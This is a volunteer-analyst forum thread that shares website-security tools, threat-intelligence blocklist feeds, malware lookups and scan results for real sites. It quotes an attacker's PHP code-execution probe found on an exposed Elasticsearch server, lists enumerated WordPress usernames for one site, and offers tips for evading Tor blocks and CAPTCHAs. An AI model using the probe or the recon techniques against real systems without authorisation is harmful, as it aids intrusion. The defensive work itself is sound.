Combine: (random example): https://urlhaus.abuse.ch/url/718410/
with https://securitytrails.com/domain/mituskicrafts.com/dns
and check here: https://www.dnssy.com/report.php

The web server appears to reveal version information. This can pose a security risk if vulnerabilities are identified in this version. You should consider disabling version information in your server configuration.

Compare to info here: https://host.io/mituskicrafts.com   
Check at: https://dnsdumpster.com/  &  https://subdomainfinder.c99.nl/ (finds Cloudflare abuse).
Whois info is redacted for privacy (or to hide abuse?).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2020, 12:01:18 AM
SHA1 insecurity

Here one can check all sort of files against a so-called colission attack: https://shattered.io/
The test has been developed in cooperation with the Dutch CWI (Centrum voor Wiskunde & Informatica).
Also Google developers were involved.

Within most modern browsers like Google Chrome and also inside the Firefox browser,
we have been protected against insecure TLS/SSL certificates over the last three years.

Only it is a pity that whenever you will download Firefox browser,
the signature over that particular binary still exclusively will make use of insecure SHA1.

Get the checksum from the master repro and the actual download from a fast mirror.
Normally files now come digitally signed.

Now consider the above check as a checking method against silent file corruption,
so also with a digital file signature you could check at shattered.io,

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2020, 02:38:44 PM
SSL-check crawl https websites for insecure content:
http://ssl-checker.online-domain-tools.com/
No longer secure and available: -http://ssl-checker.online-domain-tools.com/

Another one: https://www.cdn77.com/tls-test

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 20, 2020, 12:11:12 PM
EFF has launched a new tool to test the tracking protection of your browser with:
https://coveryourtracks.eff.org/

Coveryourtracks comes after Panopticlick was developed 10 years ago.
Read: https://www.eff.org/deeplinks/2017/11/panopticlick-30

Enjoy in your browser of choice,

polonus
Title: Re: Tests and other Media topics
Post by: Asyn on November 20, 2020, 01:13:16 PM
EFF has launched a new tool to test the tracking protection of your browser with:
https://coveryourtracks.eff.org/
Thanks for sharing Damian, according to the test my browser setup is safe. 8)
Title: Re: Tests and other Media topics
Post by: polonus on November 21, 2020, 03:52:38 PM
Cisco: Emotet-malware now in over 200 countries.
Resources: https://any.run/malware-trends/emotet  &  https://feodotracker.abuse.ch/browse/

Example IP: https://www.shodan.io/host/24.101.229.82
Site report: https://sitereport.netcraft.com/?url=dynamic-acs-24-101-229-82.zoominternet.net
Confirmed: https://www.virustotal.com/gui/ip-address/24.101.229.82/community

Another two resources for TrickBot: https://novasense-threats.com/lookup/79.110.52.103#submenu
and/=  https://pulsedive.com/threat/?tid=26 
Also see: https://paste.cryptolaemus.com/emotet/2020/11/20/emotet-C2-Deltas-1200-1700_11-20-20.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2020, 12:06:21 AM
Various resources used at covert.io threat intelligenge:
Quote
IOC Repositories
These repo’s contain threat intelligence generally updated manually when the respective orgs publish threat reports.

https://github.com/aptnotes/data
https://github.com/citizenlab/malware-indicators
https://github.com/da667/667s_Shitlist
https://github.com/eset/malware-ioc
https://github.com/fireeye/iocs
https://github.com/Neo23x0/signature-base/tree/master/iocs
https://github.com/pan-unit42/iocs
https://github.com/stamparm/maltrail/tree/master/trails/static/malware
https://github.com/stamparm/maltrail/tree/master/trails/static/suspicious
IOC Feeds
These URLs are data feeds of various types from scanning IPs from honeypots to C2 domains from malware sandboxes, and many other types. They were compiled from several sources, including (but not limited to): 1, 2, 3, 4, 5, 6. They are in alphabetical order.

http://antispam.imp.ch/wormlist
http://app.webinspector.com/recent_detections
http://atrack.h3x.eu/api/asprox_suspected.php
http://autoshun.org/files/shunlist.csv
http://blocklist.greensnow.co/greensnow.txt
http://botscout.com/last.htm
http://botscout.com/last_caught_cache.htm
http://charles.the-haleys.org/ssh_dico_attack_hdeny_format.php/hostsdeny.txt
http://cinsscore.com/list/ci-badguys.txt
http://cybercrime-tracker.net/all.php
http://cybercrime-tracker.net/ccam.php
http://cybercrime-tracker.net/ccpmgate.php
http://danger.rulez.sk/projects/bruteforceblocker/blist.php
http://data.netlab.360.com/feeds/dga/dga.txt
http://data.netlab.360.com/feeds/ek/magnitude.txt
http://data.netlab.360.com/feeds/ek/neutrino.txt
http://data.netlab.360.com/feeds/mirai-scanner/scanner.list
http://data.phishtank.com/data/online-valid.csv
http://dns-bh.sagadc.org/dynamic_dns.txt
http://feeds.dshield.org/top10-2.txt
http://hosts-file.net/?s=Browse&f=2014
http://labs.snort.org/feeds/ip-filter.blf
http://labs.sucuri.net/?malware
http://lists.blocklist.de/lists/all.txt
http://malc0de.com/bl/BOOT
http://malc0de.com/bl/IP_Blacklist.txt
http://malc0de.com/rss/
http://malwaredb.malekal.com/
http://malwaredomains.lehigh.edu/files/domains.txt
http://malwareurls.joxeankoret.com/normal.txt
http://mirror2.malwaredomains.com/files/immortal_domains.txt
http://mirror2.malwaredomains.com/files/justdomains
http://multiproxy.org/txt_all/proxy.txt
http://openphish.com/feed.txt
http://osint.bambenekconsulting.com/feeds/c2-dommasterlist-high.txt
http://osint.bambenekconsulting.com/feeds/c2-dommasterlist.txt
http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist-high.txt
http://osint.bambenekconsulting.com/feeds/c2-ipmasterlist.txt
http://osint.bambenekconsulting.com/feeds/c2-masterlist.txt
http://osint.bambenekconsulting.com/feeds/dga-feed.txt
http://ransomwaretracker.abuse.ch
http://report.rutgers.edu/DROP/attackers
http://reputation.alienvault.com/reputation.data
http://rules.emergingthreats.net/blockrules/emerging-ciarmy.rules
http://rules.emergingthreats.net/blockrules/emerging-compromised.rules
http://rules.emergingthreats.net/fwrules/emerging-PF-CC.rules
http://rules.emergingthreats.net/open/suricata/rules/botcc.rules
http://rules.emergingthreats.net/open/suricata/rules/compromised-ips.txt
http://sblam.com/blacklist.txt
http://support.clean-mx.de/clean-mx/xmlviruses.php
http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv
http://tracker.h3x.eu/api/sites_1day.php
http://virbl.org/download/virbl.dnsbl.bit.nl.txt
http://vmx.yourcmc.ru/BAD_HOSTS.IP4
http://vxvault.net/URL_List.php
http://vxvault.siri-urz.net/URL_List.php
http://vxvault.siri-urz.net/ViriList.php
http://www.autoshun.org/files/shunlist.csv
http://www.blocklist.de/lists/apache.txt
http://www.blocklist.de/lists/asterisk.txt
http://www.blocklist.de/lists/bots.txt
http://www.blocklist.de/lists/courierimap.txt
http://www.blocklist.de/lists/courierpop3.txt
http://www.blocklist.de/lists/email.txt
http://www.blocklist.de/lists/ftp.txt
http://www.blocklist.de/lists/imap.txt
http://www.blocklist.de/lists/ircbot.txt
http://www.blocklist.de/lists/pop3.txt
http://www.blocklist.de/lists/postfix.txt
http://www.blocklist.de/lists/proftpd.txt
http://www.blocklist.de/lists/sip.txt
http://www.blocklist.de/lists/ssh.txt
http://www.botvrij.eu/data/ioclist.url
http://www.ciarmy.com/list/ci-badguys.txt
http://www.dshield.org/ipsascii.html?limit=10000
http://www.falconcrest.eu/IPBL.aspx
http://www.joewein.net/dl/bl/dom-bl-base.txt
http://www.joewein.net/dl/bl/dom-bl.txt
http://www.malware-traffic-analysis.net
http://www.malwareblacklist.com/showAllMalwareURL.php?userName=Guest&sessionID=&downloadOption=0
http://www.malwaredomainlist.com/hostslist/ip.txt
http://www.malwaredomainlist.com/updatescsv.php
http://www.malwaregroup.com/ipaddresses
http://www.michaelbrentecklund.com/whm-cpanel-cphulk-banlist-whm-cpanel-cphulk-blacklist/
http://www.mirc.com/servers.ini
http://www.nothink.org/blacklist/blacklist_malware_dns.txt
http://www.nothink.org/blacklist/blacklist_malware_http.txt
http://www.nothink.org/blacklist/blacklist_malware_irc.txt
http://www.nothink.org/blacklist/blacklist_snmp_2015.txt
http://www.nothink.org/blacklist/blacklist_ssh_day.txt
http://www.projecthoneypot.org/list_of_ips.php
http://www.spamhaus.org/drop/drop.txt
http://www.spamhaus.org/drop/edrop.txt
http://www.stopforumspam.com/downloads/listed_ip_1_all.zip
http://www.stopforumspam.com/downloads/toxic_ip_cidr.txt
http://www.urlvir.com/export-hosts/
http://www.voipbl.org/update/
https://atlas.arbor.net/summary/domainlist
https://dataplane.org/sshclient.txt
https://dataplane.org/sshpwauth.txt
https://disconnect.me/lists/malvertising
https://disconnect.me/lists/malwarefilter
https://dragonresearchgroup.org/insight/sshpwauth.txt
https://dragonresearchgroup.org/insight/vncprobe.txt
https://feodotracker.abuse.ch
https://github.com/stamparm/maltrail/blob/master/trails/static/mass_scanner.txt
https://gitlab.com/ZeroDot1/CoinBlockerLists/blob/master/list.txt
https://isc.sans.edu/feeds/daily_sources
https://isc.sans.edu/feeds/suspiciousdomains_High.txt
https://isc.sans.edu/feeds/suspiciousdomains_Low.txt
https://isc.sans.edu/feeds/suspiciousdomains_Medium.txt
https://isc.sans.edu/feeds/topips.txt
https://isc.sans.edu/ipsascii.html
https://lists.malwarepatrol.net/cgi/getfile?receipt=f1417692233&product=8&list=dansguardian
https://malc0de.com/bl/ZONES
https://malsilo.gitlab.io/feeds/dumps/url_list.txt
https://malwared.malwaremustdie.org/rss.php
https://malwared.malwaremustdie.org/rss_bin.php
https://malwared.malwaremustdie.org/rss_ssh.php
https://myip.ms/files/blacklist/htaccess/latest_blacklist.txt
https://onionoo.torproject.org/details?type=relay&running=true
https://palevotracker.abuse.ch
https://paste.cryptolaemus.com/feed.xml
https://raw.githubusercontent.com/botherder/targetedthreats/master/targetedthreats.csv
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/bitcoin_nodes_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/botscout_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/cruzit_web_attacks.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/malwaredomainlist.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxylists_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxyrss_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/proxyspy_1d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/ri_web_proxies_30d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/socks_proxy_7d.ipset
https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/sslproxies_1d.ipset
https://raw.githubusercontent.com/futpib/policeman-rulesets/master/examples/simple_domains_blacklist.txt
https://raw.githubusercontent.com/Neo23x0/signature-base/master/iocs/otx-c2-iocs.txt
https://rules.emergingthreats.net/open/suricata/rules/emerging-dns.rules
https://secure.dshield.org/ipsascii.html?limit=1000
https://sslbl.abuse.ch
https://techhelplist.com/maltlqr/reports/dyreza.txt
https://techhelplist.com/pastes
https://techhelplist.com/spam-list
https://threatfeeds.io/
https://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv
https://urlhaus.abuse.ch/downloads/csv/
https://www.badips.com/get/list/any/2?age=7d
https://www.circl.lu/doc/misp/feed-osint/
https://www.dan.me.uk/torlist/
https://www.hidemyass.com/vpn-config/l2tp/
https://www.malwaredomainlist.com/hostslist/hosts.txt
https://www.maxmind.com/en/anonymous_proxies
https://www.maxmind.com/en/high-risk-ip-sample-list
https://www.openbl.org/lists/base.txt
https://www.openbl.org/lists/base_all_ftp-only.txt
https://www.openbl.org/lists/base_all_http-only.txt
https://www.openbl.org/lists/base_all_smtp-only.txt
https://www.openbl.org/lists/base_all_ssh-only.txt
https://www.packetmail.net/iprep.txt
https://www.packetmail.net/iprep_CARISIRT.txt
https://www.packetmail.net/iprep_ramnode.txt
https://www.trustedsec.com/banlist.txt
https://www.turris.cz/greylist-data/greylist-latest.csv
https://zeustracker.abuse.ch


Also interesting (example): https://firewallban.dynu.net/search.php?submit=Search&search=2.57.122.96

Search engine to search for script snippet examples: https://publicwww.com/?q=

enjoy, my good friends, enjoy and have a good week,

polonus

Title: Re: Tests and other Media topics
Post by: polonus on November 30, 2020, 12:28:35 PM
L.S.

If your origin servers are exposed attackers can attack them directly and bypass any sort of protection you may have. Many large CDN companies have bad design which allows for serious security vulnerabilities.

Check website here: https://bitmitigate.com/origin-exposure-test.html?name=

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 02, 2020, 12:03:11 AM
Check your access control to guarantee a secure connection between website and webserver behind it. Or you could find yourself in such a situation, where you find direct access to

Quote
{"099.php":{"aliases":{},"mappings":{},"settings":{"index":{"creation_date":"1606435124551","uuid":"BJaLkowESMCNLZr4WAlEHg","number_of_replicas":"1","number_of_shards":"5","version":{"created":"2030399"},"ajax":"true&a=Php&p1=die(@md5(S3pt3mb3r));"}},"warmers":{}}}
from a particular Rackspace IP address ending in /099.php ...
(weak PHP example found with Shodan.io)

A scan with the webbug tool produces this information:
Quote
HTTP/1.1 200 OK
Date: Wed, 02 Dec 2020 04:00:05 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 320
Access-Control-Allow-Origin: *
Connection: close

{
  "name" : "Super Sabre",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "2.3.3",
    "build_hash" : "218bdf10790eef486ff2c41a3df5cfa32dadcfde",
    "build_timestamp" : "2016-05-17T15:40:04Z",
    "build_snapshot" : false,
    "lucene_version" : "5.5.0"
  },
  "tagline" : "You Know, for Search"
}

Attackers may use various special search methods on Google (so-called dorks and queries on shodan.io to find low hanging fruit on the Interwebz to compromize and worse. 
Be the first party to scan, as malcreants may already have scanned you.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2020, 02:06:03 PM
Another fine resources site lost to us?

Not to be reached - isithacked.com - scan site to look at signs of Cloaking, spammy links etc.
Has it now also been discontinued? Re: https://mxtoolbox.com/SuperTool.aspx?action=mx%3aisithacked.com&run=toolpage
Re: https://sitereport.netcraft.com/?url=http%3A%2F%2Fwww.isithacked.com
https://www.virustotal.com/gui/ip-address/107.170.38.188/relations

What happened at the hoster, Digitalocean? Anyone.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 08, 2020, 03:12:51 PM
Improving DNS Privacy with Oblivious DNS:
https://blog.cloudflare.com/oblivious-dns/

Read: https://blog.cloudflare.com/oblivious-dns/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2020, 04:25:23 PM
Time to test security of your Word Press CMS here: https://hackertarget.com/wordpress-security-scan/
or scan with Sucuri's. Look for oudated plug-in software, as attackers abuse domains there to spread malware:
https://blog.sucuri.net/2020/12/the-dangers-of-using-abandoned-plugins-themes.html  (info credits: Krasimir Kronov).

Remote code execution / file upload lek in Wordpress plugin Contact Form 7 [CVE-2020-35489],
read: https://contactform7.com/2020/12/17/contact-form-7-532/
Site of researcher that found it: https://www.jinsonvarghese.com/
Astra-site: https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 30, 2020, 02:45:36 PM
Word Press is found on 40% of websites, Word Press CMS is a PHP-based CMS.

Check PHP using SNYK:
Re: https://snyk.io/vuln/npm:php_codesniffer_master
& https://support.snyk.io/hc/en-us/articles/360003817397-Snyk-for-PHP

Browser- extension: vulners webscanner alerts to vulnerabilities.
PHP vulners database: https://vulners.com/php

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 31, 2020, 06:28:14 PM
Then it is a pity this website failed a low impact test: -https://code313detroit.org/

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

Plugin   Update Status   About
js_composer    Unknown   
nd-shortcodes    Unknown   latest release (6.3)
https://nicdark.com
nd-projects    Unknown   latest release (1.3)
https://nicdark.com
contact-form-7    Unknown   latest release (5.3.2)
https://contactform7.com/
revslider    Unknown   
woocommerce 3.0.7   Warning   latest release (4.8.0)
https://woocommerce.com/
slider-revolution 6.2.2    Unknown   
nd-donations    Unknown   latest release (1.7)
https://nicdark.com
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

There are likely more plugins installed than those listed here as the detection method used here is passive. While these results give an indication of the status of plugin updates, a more comprehensive assessment should be undertaken by brute forcing the plugin paths  using a dedicated tool.

User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   code313   code313
ID: 2   garybeaver   Gary Beaver
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

However been given the all clean bill by DShield    CLEAN
AlienVault OTX      CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

Bad for our future coders, big names for charity should do a better job in leadership. Hey Google, Amazon, Verizon, Microsoft?
A very happy and healthy New Year 2021 to you all, whishes,

Damian aka polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 04, 2021, 03:52:34 PM
Is this analyzer thrustworthy: https://www.easycounter.com/report/pamcdn.avast.com ?

Does this work: https://sur.ly/web-safety-tools (as a google extension).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 18, 2021, 10:08:38 PM
Another real time website privacy inspector:
https://themarkup.org/blacklight

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 24, 2021, 05:59:38 PM
Compromise here is not that difficult -  :o

Malcode reported here: https://urlhaus.abuse.ch/url/976418/   reported Elf ; mozi malware spreader.
Where: https://www.shodan.io/host/60.176.252.134

That is China Telecom on a  SDK 4.3.0.0 UPnP/1.0 MiniUPnPd/1.6 Server.

Discovery and PoC http://github.pannier.org/simpletr64/html/discover.html
delivering ->
Quote
.shstrtab.init.text.fini.rodata.ARM.extab.ARM.exidx.eh_frame.tbss.init_array.fini_array.data.rel.ro.got.data.bss.ARM.attributes

Just the one engine to detect: https://www.virustotal.com/gui/url/e5550612ad7a10ae39ace25e46801decc4c369255eff100154b2b50b27950e69/detection

Nothing here: https://www.virustotal.com/gui/ip-address/60.176.252.134/detection
(so not unlocked a perk point  through ARM atrribute hack :P )

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 26, 2021, 09:56:12 PM
Test for modern Internet Standards:
For our forum see: https://www.internet.nl/site/forum.avast.com/1098593/

Test results only 50% of total reached.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on January 26, 2021, 10:23:40 PM
Test for modern Internet Standards:
For our forum see: https://www.internet.nl/site/forum.avast.com/1098593/ (https://www.internet.nl/site/forum.avast.com/1098593/)

Test results only 50% of total reached.

polonus
Does that explain all the spammers?
Title: Re: Tests and other Media topics
Post by: polonus on February 09, 2021, 10:19:07 PM
@ bob3160,

Partly it does explain this situation.

On the other hand it is also because the following lore is getting harder and harder to put into practice,
that is staying more or less anonymous on the Interwebz.

Read about this from fravia's legacy: http://www.darkridge.com/~jpr5/mirror/fravia.org/noanon.htm

It is explaining a lot of things, we almost cannot escape from to-day as was still possible before the year 2001 (1999 in fact).

Here a listing of services , that will block Tor users from going and visiting certain websites and services (shodan.io)
using a Tor browser, read: https://gitlab.torproject.org/legacy/trac/-/wikis/org/doc/ListOfServicesBlockingTor

You see a lot of CDNs mentioned (CloudFlare domains and the like) and even Internet-providers, particularly
lists from blocklist developers etc.

In case your provider is blocking Tor, one could use certain "bridges/mosti".

Other ways to circumvent are particular uri code scans to see the website in html code.

Then also through using Archive Wayback Machine, Archive dot fo, Google cache, Startpage dot com,
searx dot me, hypothes dot is, and various online proxies.

To evade captcha's on YouTube use hooktube dot com

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2021, 01:59:05 PM
See how we are being tracked through Amazon CloudFront,
see: https://urlscan.io/domain/gdpr-consent-tool.privacymanager.io
Example:
Re: https://sitecheck.sucuri.net/results/Mediacourant.nl
Word Press issue:
Quote
  User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   admin   
ID: 2   not found   
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation


Re: https://webcookies.org/cookies/mediacourant.nl/31205635?589950#headers
Re: Google Chrome returned code 301 to -https://www.mediacourant.nl/
GoogleBot returned code 301 to -https://www.mediacourant.nl/

Re: https://www.virustotal.com/gui/ip-address/52.84.52.106/relations (and related communicating fles detected).

And a specific tracking report: https://whotracks.me/trackers/amazon_cloudfront.html
36% tracking and 8% ads found on AWS CDN aws dot amazon dot com.
Elements from -www.google.com ; -fonts.gstatic.com ; -amazonwebservicesinc.tt.omtrdc.net & -www.youtube-nocookie.com

This website is secured: This website is secured
100% of the trackers on this site are helping protect you from NSA snooping. Why not thank amazon.com for being secure?

Identifiers | All Trackers
 Secure Identifiers
Unique IDs about your web browsing habits have been securely sent to third parties.

 -Amazon dot coms_fid
209=mzr8wotm-vqvumv3lffmgwidgp5napj9u2505afonoqnv2vXXXXXXXXXXtzibackbrkimvktwejl9xgubrrxsk13g_jphcqisc1kxkiy1a-nps5kfn2weqg3vxucp8u6ynrrndbukqkaXXXXXXXXXXalaa6y3wv3nkrfejxj8 wXw.google.comnid (XXX by me for obvious reasons)


polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 20, 2021, 04:37:38 PM
Another of this tracking survey for a particular website. Browser console info ->
Quote
CSP errors
checkdefault-src
expand_more
errorscript-src
expand_more
help_outline'self'
'self' can be problematic if you host JSONP, Angular or user uploaded files.
help_outlinehttps://cdn.polyfill.io
No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
help_outlinehttps://connect.facebook.net
No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
errorhttp://www.google-analytics.com
Allow only resources downloaded over HTTPS.
No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
errorhttps://www.google.com
www.google.com is known to host JSONP endpoints which allow to bypass this CSP.
errorhttps://www.gstatic.com
www.gstatic.com is known to host Angular libraries which allow to bypass this CSP.
errorhttp://static.ads-twitter.com
Allow only resources downloaded over HTTPS.
No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
help_outlinehttps://analytics.twitter.com
No bypass found; make sure that this URL doesn't serve JSONP replies or Angular libraries.
info_outline'nonce-**CSP_NONCE**'
Nonces should only use the base64 charset.
errordata:
data: URI in script-src allows the execution of unsafe scripts.

checkconnect-src
expand_more
checkframe-src
expand_more
errorimg-src
expand_more
check'self'
check*.blockchain.com
check*.blockchain.info
checkdata:
check*.cryptocompare.com
check*.googleusercontent.com
checkhttps://www.facebook.com
errorhttp://www.google-analytics.com
Allow only resources downloaded over HTTPS.
checkhttps://www.google.com
errorhttp://t.co/i/adsct
Allow only resources downloaded over HTTPS.

Website is insecure by default
100% of the trackers on this site could be protecting you from NSA snooping. Tell blockchain.com to fix it.

Identifiers | All Trackers
 Insecure Identifiers
Unique IDs about your web browsing habits have been insecurely sent to third parties.

d17fa83ec3d5590b861c1273eee8795121613819917 www.blockchain.com__cfduid
Legend

 Tracking IDs could be sent safely if this site was secure.

 Tracking IDs do not support secure transmission.

Help Icon
Click the icons in the tables below for a more detailed explanation.

HTTP security headers
Name

Value

Setting secure

content-security-policy

default-src 'none'; script-src 'self' https://cdn.polyfill.io https://connect.facebook.net http://www.google-analytics.com https://www.google.com https://www.gstatic.com http://static.ads-twitter.com https://analytics.twitter.com 'nonce-**csp_nonce**' data:; connect-src 'self' *.blockchain.com *.blockchain.info *.cryptocompare.com https://blockchain.info https://api.greenhouse.io https://www.google-analytics.com https://stats.g.doubleclick.net https://script.google.com https://script.googleusercontent.com; frame-src 'self' *.blockchain.com *.blockchain.info https://www.google.com https://www.youtube.com; img-src 'self' *.blockchain.com *.blockchain.info data: *.cryptocompare.com *.googleusercontent.com https://www.facebook.com http://www.google-analytics.com https://www.google.com http://t.co/i/adsct; style-src 'self' 'unsafe-inline' https://rsms.me https://fonts.googleapis.com 'nonce-**csp_nonce**'; font-src 'self' https://rsms.me https://fonts.gstatic.com data:; manifest-src 'self'; object-src 'self';

https://csp-evaluator.withgoogle.com/?csp=https://www.blockchain.com/
https://webcookies.org/cookies/www.blockchain.com/19138296
https://html.spec.whatwg.org/multipage/input.html#valid-e-mail-address

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2021, 01:38:13 PM
Better results come as we combine resources.
Example - https://www.ipqualityscore.com/domain-reputation/grynkewich.com
with https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/68.178.213.37
and https://www.virustotal.com/gui/ip-address/68.178.213.37/relations
and https://www.abuseipdb.com/check/68.178.213.37
and https://dnslytics.com/ip/68.178.213.37
See: https://sitereport.netcraft.com/?url=https://Grynkewich.com
-> https://www.virustotal.com/#/ip-address/34.102.136.180 -> https://www.virustotal.com/gui/ip-address/34.102.136.180/detection
A Tor-address used by hackers: https://ip-46.com/34.102.136.180
Reported 127 times: https://www.abuseipdb.com/check/34.102.136.180?page=2
& https://ip-46.com/68.178.213.37 
More resources: www.liveipmap.com; www.spamrats.com ; findipv6.com ; cleantalk.org ; www.ipligence.com ;
https://www.islegitsite.com/check/ ; https://urlfiltering.paloaltonetworks.com/query/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2021, 03:03:23 PM
Test for EMOTET: Check here: https://www.haveibeenemotet.com/

Fake sender and recipient meant both mail results and address was spoofed,
and was sent through anonymailer or deadfake email service.

There is no legit reason to do so or use such services,
to send mails in name of another user, it is just pure evil,
and there is no excuse for it than being banned right away.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2021, 06:21:54 AM
Another combination of resources, based on a common CloudFlare IP.

https://www.ipqualityscore.com/domain-reputation/circlecloud.net  vs https://ns.tools/circlecloud.net
https://www.ipqualityscore.com/domain-reputation/truckers.com
https://ns.tools/registeredsite.com
https://www.lookip.net/ip/172.65.252.97
https://www.shodan.io/host/172.65.252.97

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 06, 2021, 11:52:56 PM
Seen in the light of recent existing and persistent CSS-Exchange Server vulnerabilities:

https://www.zdnet.com/article/check-to-see-if-youre-vulnerable-to-microsoft-exchange-server-zero-days-using-this-tool/

and https://github.com/microsoft/CSS-Exchange/tree/main/Security

For the latest download: https://github.com/microsoft/CSS-Exchange/releases/latest/download/Test-ProxyLogon.ps1

Stay safe and secure online as well as offline,

polonus


Title: Re: Tests and other Media topics
Post by: polonus on March 07, 2021, 03:10:56 PM
Checking on a blocked script with jQuery/jquery/1.9.1 min.js in the browser.

See: https://dnsviz.net/d/ajax.aspnetcdn.com/dnssec/  (errors and alerts).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2021, 11:42:01 AM
In the same realm going over some results from the workings of my DNS Query Sniffer by Nir Sofer.

Looking up some Microsoft Telemetry addresses (Watson) -> https://domain.opendns.com/watson.microsoft.com
and https://domain.opendns.com/blobcollector.events.data.trafficmanager.net

and then see: https://dnsviz.net/d/skypedataprdcolwus15.cloudapp.net/analyze/

What errors and alerts do we find
Quote
Notices
Errors (1)
-cloudapp.net zone: The server(s) were not responsive to queries over UDP. (2620:1ec:8ec::201)
Warnings (2)
net to- cloudapp.net: The following NS name(s) were found in the authoritative NS RRset, but not in the delegation NS RRset (i.e., in the net zone): -ns2prod.18.azuredns-prd.org, -ns1prod.18.azuredns-prd.org, -ns2prod.18.azuredns-prd.info, -ns1prod.18.azuredns-prd.info
net to cloudapp.net: The glue address(es) for -ns2-201.azure-dns.net (2620:1ec:8ec::201) differed from its authoritative address(es) (2620:1ec:8ec::c9).
The original data Nir Sofer's DNS Query Sniffer produced on my device.

Host Name   Port Number   Query ID   Request Type   Request Time   Response Time   Duration   Response Code   Records Count   A   CNAME   AAAA   NS   MX   SOA   PTR   SRV   TEXT   Source Address   Destination Address   IP Country   
watson.telemetry.microsoft.com   56300   509F   A   11-3-2021 11:06:52.616   11-3-2021 11:06:52.616   0 ms   Ok   3   -104.43.193.48   -blobcollector.events.data.trafficmanager.net  -skypedataprdcolcus15.cloudapp.net                        -192.168.X.XX   -194.134.216.70      

Know that Cloudflare has zero trust in the security of their own networks. 150.000 security camera's being compromised through a hard-coded password - so, you have to be vigilant ever.

In this world you cannot trust a thing coming from the other side of your screens.

Where it went wrong and one of these domains above were involved passively:
https://www.hybrid-analysis.com/sample/f1b9d5520ba13179e19b336e542d18b0bd9f39a2b41d88a739625c8480422b73/6026cc94aa700773e73ca19c

Stay safe and secure both online and offline, is the wish of,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on March 16, 2021, 10:58:14 PM
Next to extensions as BuiltWith, Vulners Web Scanner extension, Zenmate Web Firewall (extension now discontinued)
it is also worth scanning a website online here: https://awesometechstack.com/

See the Tech Stack analysis of this malicious website: https://awesometechstack.com/analysis/website/fullzinfo.pw/
and improvement suggestions: Improvement suggestions
High
 jQuery v2.0.3   Version   Update jQuery to version 3.6.0
High
 jQuery UI v1.10.2   Security   jQuery UI@1.10.2 has 1 vulnerabilities
Medium
 jQuery v2.0.3   Security   jQuery@2.0.3 has 4 vulnerabilities
Low
 jQuery UI v1.10.2   Version   Update jQuery UI to version 1.12.1

Then compare here, where 2 retirable jquery libraries were detected:
https://retire.insecurity.today/#!/scan/c3e7742206ad74bd068554b9fb4effeb4e2c324998ee0ad2932e543318f2da81

Website abuse is, that it is into spam: https://www.virustotal.com/gui/url/fbebebf73fe18453840ed74394506ac439d8bc14ec2d048856fac1842f1677dc/detection

